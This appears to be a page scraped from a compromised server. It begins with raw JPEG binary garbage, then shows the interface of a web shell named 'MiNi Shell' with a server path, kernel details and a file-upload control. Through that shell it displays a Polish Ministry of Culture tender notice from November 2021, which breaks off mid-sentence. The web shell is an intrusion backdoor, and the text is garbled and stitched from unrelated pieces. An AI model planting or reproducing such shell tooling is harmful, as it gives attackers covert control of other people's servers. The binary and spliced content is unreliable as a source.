JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211124/0028168401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa przygotowania i utrzymania Elektronicznego Systemu Rejestracji Wniosków </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MINISTERSTWO KULTURY I DZIEDZICTWA NARODOWEGO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000274068</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Krakowskie Przedmieście 15/17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-071</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 42 10 479</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">aswierczynska@kultura.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mkidn.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> kultura, dziedzictwo narodowe </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa przygotowania i utrzymania Elektronicznego Systemu Rejestracji Wniosków </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8e54f8cc-4c5f-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00281684</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00006749/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.36 Usługa przygotowania i utrzymania Elektronicznego Systemu Rejestracji Wniosków</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia-mkidn.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia-mkidn.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie § z 1 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r.w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. poz. 2452) określa informacje na temat<br/>specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu<br/>przekazania i odbioru danych:1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 512 kb/s; 2)komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB<br/>Ram, procesor Intel<br/>Pentium IV 2GHZ, jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10.4, Linux, lub ich<br/>nowsze wersje; 3) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w<br/>najnowszej wersji, w przypadku Internet Explorer minimalnie wersja 10.0 Uwaga - korzystanie<br/>z operacyjnych przeglądarek lub z systemów operacyjnych oraz przeglądarek niewspieranych przez<br/>producenta może skutkować pojawieniem się nieprawidłowości i błędów w funkcjonowaniu<br/>Platformy;4)włączona obsługa JavaScript; 5) zainstalowany program Acrobat Reader lub inny<br/>obsługujący pliki w formacie .pdf. 6) dokumenty w formacie .pdf zaleca się podpisywać formatem<br/>PAdES;7) dopuszcza się podpisanie dokumentów w formacie innym niż .pdf, wtedy będzie wymagany<br/>oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć oddzielny plik z<br/>podpisem.6. Zamawiający zgodnie z § 3 ust. 3 ww. Rozporządzenia określa dopuszczalne formaty<br/>przesyłanych danych tj. plikówo wielkości do 70 MB w formatach: .pdf, .xls, .xlsx, .doc, .docx, .odt,<br/>.ods, .odp, .ppt, .pptx, .jpg, .jpeg,.tif, .tiff, .png, .svg, .zip, .7z, PAdES, XAdES. Pozostałe wymagania<br/>zostały umieszczone w SWZ opublikowanej na Platformie zakupowej pod adresem: https://zamowienia<br/>mkidn.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że: 1) administratorem Pani/Pana danych<br/>osobowych jest: Minister Kultury i Dziedzictwa Narodowego ul. Krakowskie Przedmieście 15/17,<br/>00-071 Warszawa; 2) w sprawach związanych z Pani/Pana danymi proszę kontaktować się z<br/>Inspektorem Ochrony Danych Osobowych w Ministerstwie Kultury i Dziedzictwa Narodowego za<br/>pomocą poczty tradycyjnej na adres Ministerstwo Kultury i Dziedzictwa Narodowego, ul. Krakowskie<br/>Przedmieście 15/17, 00-071 Warszawa, pocztą elektroniczną na adres:<br/>abi@kultura.gov.pl; 3)Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit.c<br/>RODO w celu związanym z prowadzeniem niniejszego postępowania o udzielenie zamówienia<br/>publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny<br/>stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający na<br/>Zamawiającym; Pozostałe informacje dot.RODO zostały umieszczone w SWZ opublikowanej na<br/>Platformie zakupowej pod adresem: https://zamowienia-mkidn.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie przez osobę, której dane osobowe dotyczą, z<br/>uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 Rozporządzenia 2016/679,nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień<br/>umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.2. W postępowaniu o<br/>udzielenie zamówienia złożenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1<br/>Rozporządzenia 2026/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego<br/>postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">25/TP/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa przygotowania i utrzymania Elektronicznego Systemu Rejestracji Wniosków </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72400000-4 - Usługi internetowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty spośród ofert<br/>niepodlegających odrzuceniu na podstawie wskazanych w SWZ kryteriów.1. Zamawiający będzie liczył<br/>punkty w zaokrągleniu do dwóch miejsc po przecinku.<br/>2. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom określonym w Ustawie oraz niniejszej Specyfikacji i zostanie oceniona jako<br/>najkorzystniejsza w oparciu o podane kryteria wyboru, czyli temu, który otrzyma najwyższą łączną<br/>wartość punktową ze wszystkich kryteriów, (A+B+C+D).<br/>3. Jeżeli w postępowaniu o udzielenie zamówienia, w którym jedynym kryterium oceny ofert jest cena<br/>lub koszt, nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone<br/>oferty o takiej samej cenie lub koszcie, zgodnie z art. 249 ustawy Pzp, Zamawiający wzywa<br/>Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert<br/>dodatkowych zawierających nową cenę lub koszt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas przygotowania Systemu do realizacji usługi w części określonej w § 1 ust 2 pkt 1 – 5 Wzoru Umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas naprawy błędu uniemożliwiającego pracę Systemów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas naprawy błędu, który nie powoduje wstrzymania pracy Systemów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 4.1) Wykonawca spełni warunek, jeżeli wykaże, że wykonał należycie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej jedną usługę trwającą nieprzerwanie przez co najmniej 12 m-cy o wartości minimum 250 tys brutto, która obejmowała swoim zakresem:<br/>a) świadczenie usług w modelu ASP przy zapewnieniu ciągłości działania systemu i potwierdzonej jego wydajności co najmniej dla 1000 użytkowników zew. jednocześnie pracujących prawidłowo na systemie, oraz obsługi co najmniej 2000 wniosków elektronicznych (co najmniej 3 wielostronicowe formularze wniosków elektronicznych, których pola pozwalają na sumowanie danych, walidację, ukrywanie, wstawianie nowych wierszy do tabeli oraz obsługiwał<br/>podpis elektroniczny zgodny z schematem XadES) złożonych w ciągu jednego tygodnia, które w sposób zautomatyzowany były przekazywane do systemu obiegu dokumentów oraz b) świadczenie usług wsparcia dla co najmniej 2.000 użytkowników końcowych (pomocy technicznej, dedykowany hotline)<br/>4.2)<br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje co najmniej 6 osobami zdolnymi do wykonania zamówienia, które posiadają następujące kwalifikacje:<br/>1) Specjalistą ds. integracji systemów informatycznych (1 osoba), który posiada minimum 2 letnie doświadczenie zawodowe we wdrażaniu i obsłudze systemów informatycznych,<br/>2) Specjalistami ds. pomocy technicznej (4 osób), który posiadają minimum rok doświadczenia zawodowego w branży związanej z realizacją usług wsparcia technicznego 3) Specjalista ds. programistycznych (1 osoba), która posiada minimum 2 letnie doświadczenie<br/>zawodowe w branży związanej z realizacja usług programistycznych.<br/>Funkcji wskazanych w Rozdziale 4 pkt. ppkt. 4.2 tiret od 1 do 3 nie można łączyć. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy, o którym mowa w art. 125 ust. 1 ustawy Pzp, o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu oraz Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy pzp, podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu (jeżeli dotyczy) <br/>Oświadczenie składa każdy z Wykonawców. <br/>Oprócz oświadczenia , o którym mowa w art. 125 ust. 1 ustawy 1. na potwierdzenie niepodlegania wykluczeniu Zamawiający żąda poniższych środków podmiotowych:<br/>1. Zamawiający będzie żądał następujących dokumentów składanych w celu potwierdzenia braku<br/>podstaw wykluczenia, o których mowa w Rozdz. 4 pkt II:<br/>a) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 6 Ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – wzór stanowi Załącznik<br/>nr 3 do niniejszej SWZ;<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast:<br/>1) odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, o których mowa w rozdz. 5.III.1b - składa dokument lub dokumenty<br/>wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające<br/>odpowiednio, że:<br/>a) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje<br/>się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach<br/>miejsca wszczęcia tej procedury.<br/>3. Dokument, o którym mowa w pkt. 2 ppkt. 1) , powinien być wystawiony nie wcześniej niż 3 miesiące<br/>przed jego złożeniem.<br/>4. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w pkt. 2, lub gdy dokumenty te nie odnoszą się do wszystkich<br/>przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1, 2 lit. a i b oraz pkt 3<br/>ustawy Pzp, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym<br/>odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub,<br/>jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o<br/>oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem,<br/>organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający będzie żądał następujących dokumentów składanych w<br/>celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>1) warunku, o którym mowa w rozdz. 4 pkt I ppkt. 4 – Zamawiający<br/>zażąda (według wzoru stanowiącego załącznik nr 7 do SWZ):<br/>a) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania<br/>i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem<br/>dowodów określających, czy te usługi zostały wykonane lub są wykonywane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane,<br/>a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie<br/>wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje<br/>bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie<br/>ostatnich 3 miesięcy;<br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz<br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień,</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Pełnomocnictwo, odpowiednio:<br/>1) upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>2) dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia – dotyczy Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>Pełnomocnictwo należy składać w formie elektronicznej lub w postaci elektronicznej opatrzone<br/>podpisem zaufanym, podpisem osobistym lub kwalifikowanym podpisem elektronicznym.<br/>Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego<br/>uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego<br/>stosowanie do art. 97 § 2 ustawy z dnia 14 lutego 1991 roku – Prawo o notariacie, które to<br/>poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez<br/>opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym<br/>podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia<br/>pełnomocnictwa nie może być uwierzytelniona przez 